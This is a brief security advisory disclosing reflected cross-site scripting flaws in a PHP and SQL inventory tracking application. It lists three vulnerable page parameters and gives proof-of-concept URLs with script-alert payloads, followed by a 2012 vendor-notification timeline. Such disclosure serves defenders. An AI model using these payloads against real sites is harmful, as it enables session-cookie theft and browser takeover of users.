0x01 Description
0x02 XSS
0x03 Vendor Notification
PHP + SQL Inventory tracking system
The Inventory application has multiple pages and parameters that are
vulnerable to cross-site scripting. This
vulnerabilities could be used to steal session cookies or take control
of a client's browser.
-----Vulnerable Pages-----
http://localhost/inventory/consulta_fact.php?fact_num=[XSS]
http://localhost/inventory/newinventario.php?sn=[XSS]
http://localhost/inventory/newtransact.php?ref=[XSS]
-----PoC Exploit-----
http://localhost/inventory/consulta_fact.php?fact_num=<script>alert(1)</script>
http://localhost/inventory/newinventario.php?sn=<script>alert(100)</script>
http://localhost/inventory/newtransact.php?ref=<script>alert(100)</script>
10/19/12 - Vendor Notified
10/26/12 - No response, disclosure